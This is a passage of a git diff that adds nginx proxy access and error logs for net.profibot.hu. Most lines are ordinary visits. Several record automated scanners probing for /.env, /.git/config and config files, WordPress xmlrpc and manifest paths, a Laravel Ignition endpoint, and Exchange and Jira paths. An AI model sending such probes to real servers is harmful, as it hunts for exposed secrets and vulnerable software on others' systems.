[Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[01/Feb/2026:10:48:43 +0000] - 200 200 - GET https net.profibot.hu "/images/logo-no-text.svg" [Client 84.254.106.197] [Length 9008] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[01/Feb/2026:10:48:43 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon-16x16.png" [Client 84.254.106.197] [Length 1512] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[01/Feb/2026:10:48:43 +0000] - 200 200 - GET https net.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[01/Feb/2026:10:48:43 +0000] - 200 200 - GET https net.profibot.hu "/js/lkk_ch.js" [Client 84.254.106.197] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[01/Feb/2026:11:31:58 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 149.57.180.185] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[01/Feb/2026:14:10:52 +0000] - 405 405 - POST https net.profibot.hu "/" [Client 85.11.167.4] [Length 556] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://net.profibot.hu" +[01/Feb/2026:14:10:52 +0000] - 405 405 - POST https net.profibot.hu "/" [Client 85.11.167.4] [Length 556] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://net.profibot.hu" +[01/Feb/2026:14:20:20 +0000] - - 301 - GET http net.profibot.hu "/" [Client 35.247.144.7] [Length 166] [Gzip -] [Sent-to 127.17.0.1] "curl/7.83.1" "-" +[01/Feb/2026:14:20:21 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 35.247.144.7] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "curl/7.83.1" "-" +[01/Feb/2026:14:20:21 +0000] - - 301 - GET http net.profibot.hu "/wordpress/" [Client 35.247.144.7] [Length 166] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0 Safari/537.36" "-" +[01/Feb/2026:14:20:21 +0000] - 200 200 - GET https net.profibot.hu "/wordpress/" [Client 35.247.144.7] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0 Safari/537.36" "-" +[01/Feb/2026:15:24:39 +0000] - - 301 - GET http net.profibot.hu "/" [Client 35.222.6.130] [Length 166] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[01/Feb/2026:15:24:40 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 35.222.6.130] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "http://net.profibot.hu" +[01/Feb/2026:18:20:50 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 23.27.145.225] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[01/Feb/2026:18:21:34 +0000] - 200 200 - GET https net.profibot.hu "/_ignition/execute-solution" [Client 107.21.198.213] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15" "-" +[02/Feb/2026:00:26:55 +0000] - - 301 - GET http net.profibot.hu "/" [Client 208.84.101.66] [Length 166] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:00:26:56 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:00:26:56 +0000] - 200 200 - GET https net.profibot.hu "//wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:00:26:56 +0000] - 200 200 - GET https net.profibot.hu "//xmlrpc.php?rsd" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:00:26:56 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:00:26:57 +0000] - 200 200 - GET https net.profibot.hu "//blog/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:00:26:57 +0000] - 200 200 - GET https net.profibot.hu "//web/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:00:26:57 +0000] - 200 200 - GET https net.profibot.hu "//wordpress/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:00:26:57 +0000] - 200 200 - GET https net.profibot.hu "//website/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:00:26:57 +0000] - 200 200 - GET https net.profibot.hu "//wp/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:00:26:57 +0000] - 200 200 - GET https net.profibot.hu "//news/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:00:26:57 +0000] - 200 200 - GET https net.profibot.hu "//2018/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:00:26:57 +0000] - 200 200 - GET https net.profibot.hu "//2019/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:00:26:58 +0000] - 200 200 - GET https net.profibot.hu "//shop/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:00:26:58 +0000] - 200 200 - GET https net.profibot.hu "//wp1/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:00:26:58 +0000] - 200 200 - GET https net.profibot.hu "//test/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:00:26:58 +0000] - 200 200 - GET https net.profibot.hu "//media/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:00:26:58 +0000] - 200 200 - GET https net.profibot.hu "//wp2/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:00:26:58 +0000] - 200 200 - GET https net.profibot.hu "//site/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:00:26:58 +0000] - 200 200 - GET https net.profibot.hu "//cms/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:00:26:58 +0000] - 200 200 - GET https net.profibot.hu "//sito/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:00:26:59 +0000] - - 400 - - https net.profibot.hu "-" [Client 208.84.101.66] [Length 0] [Gzip -] [Sent-to ] "-" "-" +[02/Feb/2026:04:32:22 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 167.99.114.157] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[02/Feb/2026:06:12:53 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 34.7.197.21] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Arch; Linux x86_64; rv:127.0.2) Gecko/20100101 Firefox/127.0.2" "-" +[02/Feb/2026:08:02:19 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 104.236.23.35] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[02/Feb/2026:09:49:39 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 167.71.92.139] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0" "-" +[02/Feb/2026:10:39:08 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 84.254.106.197] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[02/Feb/2026:10:39:08 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon.ico" [Client 84.254.106.197] [Length 15086] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[02/Feb/2026:10:39:08 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/site.webmanifest" [Client 84.254.106.197] [Length 458] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[02/Feb/2026:10:39:08 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/safari-pinned-tab.svg" [Client 84.254.106.197] [Length 5718] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[02/Feb/2026:10:39:09 +0000] - 200 200 - GET https net.profibot.hu "/css/support_parent.css" [Client 84.254.106.197] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[02/Feb/2026:10:39:09 +0000] - 200 200 - GET https net.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[02/Feb/2026:10:39:09 +0000] - 200 200 - GET https net.profibot.hu "/js/lkk_ch.js" [Client 84.254.106.197] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[02/Feb/2026:10:39:09 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon-32x32.png" [Client 84.254.106.197] [Length 2696] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[02/Feb/2026:10:39:09 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon-16x16.png" [Client 84.254.106.197] [Length 1512] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[02/Feb/2026:10:39:09 +0000] - 200 200 - GET https net.profibot.hu "/images/logo-no-text.svg" [Client 84.254.106.197] [Length 9008] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[02/Feb/2026:10:39:09 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/apple-touch-icon.png" [Client 84.254.106.197] [Length 16709] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[02/Feb/2026:11:24:42 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 149.57.180.35] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[02/Feb/2026:18:45:23 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 23.27.145.200] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[02/Feb/2026:19:56:49 +0000] - 200 200 - GET https net.profibot.hu "/.env" [Client 34.48.188.110] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0" "-" +[02/Feb/2026:19:56:49 +0000] - - 301 - GET http net.profibot.hu "/.env" [Client 34.48.188.110] [Length 166] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0" "-" +[02/Feb/2026:20:37:12 +0000] - - 301 - GET http net.profibot.hu "/" [Client 167.71.16.125] [Length 166] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[02/Feb/2026:20:37:13 +0000] - - 301 - GET http net.profibot.hu "/favicon.ico" [Client 167.71.16.125] [Length 166] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "http://net.profibot.hu/" +[02/Feb/2026:20:37:13 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 167.71.16.125] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[02/Feb/2026:20:37:16 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon-32x32.png" [Client 167.71.16.125] [Length 2696] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "https://net.profibot.hu/" diff --git a/proxy-manager/data/logs/proxy-host-11_error.log b/proxy-manager/data/logs/proxy-host-11_error.log new file mode 100755 index 0000000..79483cc --- /dev/null +++ b/proxy-manager/data/logs/proxy-host-11_error.log @@ -0,0 +1,182 @@ +2026/01/31 10:05:34 [warn] 293#293: *18248 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET / HTTP/1.1", host: "net.profibot.hu" +2026/01/31 10:05:34 [error] 286#286: *18245 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 104.164.173.239, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:05:34 [error] 296#296: *18252 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:05:35 [warn] 295#295: *18256 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /server HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:36 [error] 294#294: *18257 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /server HTTP/1.1", upstream: "https://172.18.0.2:81/server", host: "net.profibot.hu" +2026/01/31 10:05:36 [warn] 296#296: *18261 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /server-status HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:37 [error] 293#293: *18262 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /server-status HTTP/1.1", upstream: "https://172.18.0.2:81/server-status", host: "net.profibot.hu" +2026/01/31 10:05:38 [warn] 294#294: *18268 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /about HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:39 [error] 293#293: *18269 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /about HTTP/1.1", upstream: "https://172.18.0.2:81/about", host: "net.profibot.hu" +2026/01/31 10:05:39 [warn] 293#293: *18272 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /login.action HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:40 [error] 293#293: *18273 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /login.action HTTP/1.1", upstream: "https://172.18.0.2:81/login.action", host: "net.profibot.hu" +2026/01/31 10:05:40 [warn] 293#293: *18276 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /v2/_catalog HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:40 [warn] 293#293: *18277 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /.DS_Store HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:40 [error] 293#293: *18278 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /v2/_catalog HTTP/1.1", upstream: "https://172.18.0.2:81/v2/_catalog", host: "net.profibot.hu" +2026/01/31 10:05:41 [error] 293#293: *18281 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /.DS_Store HTTP/1.1", upstream: "https://172.18.0.2:81/.DS_Store", host: "net.profibot.hu" +2026/01/31 10:05:41 [warn] 293#293: *18284 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /.env HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:42 [error] 293#293: *18285 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /.env HTTP/1.1", upstream: "https://172.18.0.2:81/.env", host: "net.profibot.hu" +2026/01/31 10:05:43 [error] 293#293: *18288 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 51.81.245.138, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:05:43 [warn] 293#293: *18291 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:44 [error] 293#293: *18292 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 51.81.245.138, server: net.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "https://172.18.0.2:81/favicon.ico", host: "net.profibot.hu" +2026/01/31 10:05:44 [error] 293#293: *18295 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1", upstream: "https://172.18.0.2:81/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application", host: "net.profibot.hu" +2026/01/31 10:05:45 [warn] 293#293: *18299 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /.git/config HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:46 [error] 293#293: *18300 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /.git/config HTTP/1.1", upstream: "https://172.18.0.2:81/.git/config", host: "net.profibot.hu" +2026/01/31 10:05:46 [warn] 293#293: *18303 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "POST /graphql HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:46 [warn] 293#293: *18304 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "POST /api HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:46 [warn] 295#295: *18308 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "POST /api/graphql HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:46 [error] 293#293: *18298 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 104.164.173.16, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:05:47 [warn] 293#293: *18309 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "POST /graphql/api HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:47 [warn] 293#293: *18310 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "POST /api/gql HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:47 [error] 293#293: *18311 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "POST /graphql HTTP/1.1", upstream: "https://172.18.0.2:81/graphql", host: "net.profibot.hu" +2026/01/31 10:05:47 [warn] 293#293: *18314 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /s/139313e2531323e22383e21393/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:47 [error] 293#293: *18315 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "POST /api HTTP/1.1", upstream: "https://172.18.0.2:81/api", host: "net.profibot.hu" +2026/01/31 10:05:48 [error] 293#293: *18318 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "POST /api/graphql HTTP/1.1", upstream: "https://172.18.0.2:81/api/graphql", host: "net.profibot.hu" +2026/01/31 10:05:48 [warn] 293#293: *18321 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /config.json HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:48 [error] 293#293: *18322 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "POST /graphql/api HTTP/1.1", upstream: "https://172.18.0.2:81/graphql/api", host: "net.profibot.hu" +2026/01/31 10:05:49 [error] 293#293: *18325 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "POST /api/gql HTTP/1.1", upstream: "https://172.18.0.2:81/api/gql", host: "net.profibot.hu" +2026/01/31 10:05:49 [error] 293#293: *18328 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /s/139313e2531323e22383e21393/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1", upstream: "https://172.18.0.2:81/s/139313e2531323e22383e21393/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties", host: "net.profibot.hu" +2026/01/31 10:05:50 [error] 293#293: *18331 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) 